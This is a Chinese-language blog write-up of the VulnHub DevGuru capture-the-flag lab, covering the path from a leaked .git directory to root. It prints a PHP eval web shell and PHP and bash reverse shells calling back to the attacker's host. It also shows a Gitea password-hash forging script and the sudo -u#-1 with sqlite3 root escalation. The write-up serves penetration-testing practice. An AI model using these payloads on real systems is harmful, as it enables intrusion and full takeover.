vulnhub--devguru

最新推荐文章于 2024-05-30 13:37:12 发布
最新推荐文章于 2024-05-30 13:37:12 发布
阅读量663 收藏 1
点赞数
分类专栏: vulnhub靶场 文章标签: 渗透测试 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45922278/article/details/113786760
版权

描述

DevGuru是一家虚构的Web开发公司,它聘请您进行渗透测试。您的任务是在他们的公司网站上查找漏洞并获得根。

就像OSCP一样〜现实生活为基础

难度:中级(取决于经验)

目录

一、信息搜集

1.nmap端口扫描:

2.dirsearch目录扫描:

二、漏洞探测&利用

1 . GitHack.py

2.登入cms后台

1)写入一句话木马。

2)或者反弹shell

3.获取gitea数据库密码

1)在github 找到加密方式(大佬方式)

2)在gethub上找到默认密码

4.shell(更高权限)

三、提权

四、总结

一、信息搜集

1.nmap端口扫描:

2.dirsearch目录扫描:

python3 dirsearch.py -u http://192.168.155.133/ -e php

http: //192.168.155.133:8585
http: //192.168.155.133/.git/
http: //192.168.155.133/adminer.php
http: //192.168.155.133/backend/backend/auth

二、漏洞探测&利用

1 . GitHack.py

查看数据库配置文件。/config/database.php

 'username' => 'october'

 'password' => 'SQ66EBYx4GT3byXH'

 

访问http: //192.168.155.133/adminer.php ,登入

 

新建一个用户,并提到管理员。

 

将aaa用户设置成管理员组

 

2.登入cms后台

账号密码:aaa/123456

http: //192.168.155.133/backend/backend/auth

然后查资料知道后台是可以自定义模板文件的,那就是说我们可以往里写入PHP代码。(低权限shell)

1)写入一句话木马。

写入代码:

function onStart(){
     //蚁剑连接
    eval($_REQUEST[999]);
    }

 

2)或者反弹shell

写入代码:

function onStart(){
//nc监听4444端口
    $s=fsockopen("192.168.155.134",4444);
    $proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
    }

 

ncat -lvp 4444

 

3.获取gitea数据库密码

gitea/UfFPTF8C8jjxVF2m

登入数据库后,查看表信息。

 

需要改个密码。

1)在github 找到加密方式(大佬方式)

https://github.com/go-gitea/gitea/blob/master/models/user.go

 

python脚本解密:

https://blog.csdn.net/qq_42486920/article/details/80836749

 

importhashlib
importbinascii

password=b"password"
salt=b"Bop8nwtUiM"
dk=hashlib.pbkdf2_hmac("sha256",password,salt,10000,dklen=50)
print(binascii.hexlify(dk))

得到:8c1081ea93e4803d6aa627fca52970b8bb06c35e7fa2c47e1eae3e4f5e6c9515dfaf13d62292547583aef0ee683f92e71c40

明文为:password

2)在gethub上找到默认密码

搜索加密关键词:passwd_hash_algo

 

 

 

4.shell(更高权限)

登入getea:http://192.168.155.133:8585/

账号密码:frank/password

 

bash -c "exec bash -i >& /dev/tcp/192.168.155.134/5555 0>&1"        

    

ncat -lvvp 5555

 

之后点击 README.md 添加点东西

 

 

三、提权

得到shell后,输入 sudo -l

使用 sqlite3 提权

并得到flag

 

https://gtfobins.github.io/ 上查询linux下关于sqlite3的提权漏洞

用户使用sudo时会要求输入密码,这个无解。

查看sudo版本,搜索 Sudo version 1.8.21p2

sudo -u#-1

 

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'

 

四、总结

  • GitHack.py 源码泄露  http: //192.168.155.133/.git/
  • 数据库后台查看用户密码被加密时,可修改已知为密码,注意盐值。或添加一个管理员账号。
  • OctoberCms 后台是可以自定义模板文件的,可以写入php代码。
  • getea 上代码提交后通过webhook 写shell
  • 查询linux下关于sqlite3的提权 https://gtfobins.github.io/
  • sudo低版本漏洞sudo -u#-1
  • sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'
  • git源码泄露 => 找到数据库密码,登入 => 找到cms后台用户密码,改为已知密码 => 登入cms后台,写shell(低权限)=> gitea数据库配置备份文件泄露 => 连接gitea数据库,找到gitea的用户密码 => 登入gitea,写shell(更高权限) => 提权。

 

New6ie
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
vulnhubdevguru靶场打靶
maple_leaf
10-19 480
Devguruvulnhub中一个靶场,DevGuru 是一家虚构的网络开发公司,聘请您进行渗透测试评估。您的任务是在其公司网站上查找漏洞并获得root
vulnhub devguru渗透笔记
weixin_52268949的博客
03-26 626
靶机下载地址:https://vulnhub.com/entry/devguru-1,620/
vulhub靶场DEVGURU: 1-SUDO提权
最新发布
qq_55349490的博客
05-30 942
git源码泄露 => 找到数据库密码,登入 => 找到cms后台用户密码,改为已知密码 => 登入cms后台,写shell(低权限)gitea数据库配置备份文件泄露 => 连接gitea数据库,找到gitea的用户密码 => 登入gitea,写shell(更高权限) => 提权。
vulnhubdevguru靶场提权过程(vulnhub打靶日记)
guanjian_ci的博客
04-02 1092
考点:1、拿下站点、敏感文件后,需要细心的审计搜索有价值的信息,特别是账号密码。2、常见网站october、gieat的历史漏洞,利用已知漏洞反弹shell,拿下网站。3、熟悉数据库后台创建用户,添加用户组,编辑用户的操作。4、了解linux提权常用操作,内核漏洞>suid/sudo>环境变量/计划任务等等。难点:1、常见网站october、gieat的历史漏洞,这些站点的漏洞能否成功利用提权,对于小白来说是块硬骨头。2、获取mysql的frank用户时,此处用的是修改加密方式、修改密码。
VulnHub靶场笔记 - DevGuru: 1(OSCP推荐靶场)
m0_62652276的博客
12-02 1174
OSCP推荐靶场:VulnHub DevGuru: 1 个人打靶笔记
VulnHub-DevGuru: 1
江左盟的博客
08-06 1万+
信息收集 使用Nmap扫描目标主机发现目标主机开启22,80和8585端口,分别运行着OpenSSH 7.6p1服务,Apache httpd 2.4.29服务和git存储库,且服务器80端口存在.git目录,操作系统为Ubuntu,如图: 利用GitHack将源码下载到本地,如图: 查看README.md文件发现该网站使用October CMS,查看config/database.php文件发现MySQL数据库:octoberdb,用...
vulnhub-Nagini.txt
06-10
Nagini
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
网络安全渗透测试
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
**VulnHub Walkthroughs: Alienum 演练详解** 在网络安全领域,VulnHub 是一个深受爱好者和专业人员欢迎的平台,它提供了一系列虚拟机(VM)镜像,用于模拟真实的网络环境,帮助用户提升漏洞利用和渗透测试的技能。...
vulnhub-DevGuru:1
yutianovo的博客
12-24 909
靶机描述 DevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on their corporate website and obtaining root. OSCP like ~ Real life based Difficulty: Intermediate (Depends on exp
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5435
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3084
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7723
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7236
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 2156
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5929
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值